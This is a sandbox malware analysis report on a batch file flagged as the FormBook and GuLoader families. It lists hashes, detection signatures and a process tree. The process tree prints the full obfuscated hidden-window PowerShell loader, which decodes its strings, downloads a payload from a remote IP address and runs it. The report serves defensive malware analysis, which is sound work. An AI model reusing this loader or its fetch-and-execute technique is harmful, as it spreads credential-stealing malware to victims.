Edit tour
Windows
Analysis Report
Doc_004024024001.bat
Overview
General Information
| Sample name: | Doc_004024024001.bat |
| Analysis ID: | 1431497 |
| MD5: | dfdb6404a262056b5e81e9bd0814d8aa |
| SHA1: | c6f2e620bbe3539d4a962c8b5509445ca0be2333 |
| SHA256: | 780eb381525edae3d27084370ae2e02dc4607842ccee9a8daae733475eb699bc |
| Tags: | bat |
| Infos: |   |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 5828 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\Doc_0 0402402400 1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 5984 cmdline: powershell .exe -wind owstyle hi dden "$Slv tjsskabets 3 = 1;$Ado ptionsbevi llingers=' S';$Adopti onsbevilli ngers+='ub strin';$Ad optionsbev illingers+ ='g';Funct ion Takilm an203($Pre fade){$Unc onversable =$Prefade. Length-$Sl vtjsskabet s3;For($Ma gnetometri cal=1; $Ma gnetometri cal -lt $U nconversab le; $Magne tometrical +=(2)){$Ca rdsharping +=$Prefade .$Adoption sbevilling ers.Invoke ($Magnetom etrical, $ Slvtjsskab ets3);}$Ca rdsharping ;}function Roebling( $Unmotivat edly){& ( $Opmuntrin gernes) ($ Unmotivate dly);}$Gla tslebnes=T akilman203 ' M o,zHi Sl l,a /F5 m.B0G (GWT iInId,o w. sM NfT, 1S 0C.,0G;P H WSi,n,6V4 ; Px 6V4S; S .rVvB:L1 D2C1N.U0 ) . G.e cDk oE/U2M0B1 0P0D1,0b1F FCiSr,eWf CoFx./,1,2 R1 . 0A '; $Butikshan dlerne=Tak ilman203 ' U,s e.r - A gUeMnKt ';$Winter feeding=Ta kilman203 ',h.tLt,pT :C/,/S8F7 . 1 2 1D.. 1 0N5N.B1 6A3S/SPSu nDkDt e,t. .,hShIp. ' ;$Lessonin g=Takilman 203 '.>S ' ;$Opmuntri ngernes=Ta kilman203 'Ki e xP ' ;$Farvefab rikkerne=' Overbraine d';Roeblin g (Takilma n203 'bS,e itH-SC o n .t e n.t K -DPUa,tNh, TT,: \.C. hoi s e lA i n.g sI.G t xDt - V aOlFuSei $,FUa r v eDfFaIbjrD iDk.k.e rL n eT;S '); Roebling ( Takilman20 3 '.i,f. T (,tSe sctu -kp aTtKh, ATF: \kC h i.sBe l iCn.gRsP.. tWxStK) {E eUx i t } ;W ');$Ele ctriceel = Takilman2 03 ' eEcPh OoV %,anp, pRd aGtHar % \BS t rK eCg mGa.aU lRe nRe .G DUiTsr &S& k Ae c,h.o . v$ ';Roe bling (Tak ilman203 ' ,$ g lroBb aSlK: R u HbHiMcGoWn = (.cTmSd R A/ScD $I ERl e,cet, r iPc.e e lF)V ');Ro ebling (Ta kilman203 ' $,gEl oA b aUlH:KGG aIrAa n.tA sT=.$AW i n.tSeErFfR e eAd,iTn g..OsHp l, i tB(S$ L ePsUsSo.nS i nDgU)N ' );$Winterf eeding=$Ga rants[0];R oebling (T akilman203 ' $Bg l o FbsaFl :DF AiFn,gAe r vPaHnCtPe Rn.= N,eIw e- OKbMjMe Cc.t BSMy s.tGePmH., NueAt,. W. eLb.C.lBiC e,nCtB '); Roebling ( Takilman20 3 'G$NF.i nPgHe rUv aTnstNeWn . HPe a dK e rus [ $E BSu tRiDkS sAhSa n dL l,errRn e ]R=I$TG l a.t s l eS b nMe,si ' );$Formatl inietegnet s=Takilman 203 ' FMi, nFgLe rSv a nBt.eunC .HDFoNw n lSoFaMdWFB i.lTeP(.$A WFiMnOt,eH rEfWeFe di i n,gP,E$F DPuKblbFiK nA)P ';$Fo rmatliniet egnets=$Ru bicon[1]+$ Formatlini etegnets;$ Dubbin=$Ru bicon[0];R oebling (T akilman203 'M$ g l,o Kb,aVls:,B UeSgMy.nDd Pe rGk,o.n Ms,t,r,uMk Rt iCo n 4 1U=I(.T.e ,sHtO-APPa tFhS .$BD vu.bAb.i n I) ');whil e (!$Begyn derkonstru ktion41) { Roebling ( Takilman20 3 ',$ gSl oBb aClP:. m aTr.iJn e s,tpa to iFoFnRe rP n.e s =B$f tJr uFe ') ;Roebling $Formatli nietegnets ;Roebling (Takilman2 03 'US.tLa Sr tF- SMl Be.e,p K4D ');Roebli ng (Takilm an203 'Y$, g lMobb a, lF: BFe g yTnKd.e rB kPo,nvsSt. rGutk.t,i, o.n 4B1,=I ( T e s tA -.PSaSt,hM S$ DLuBbM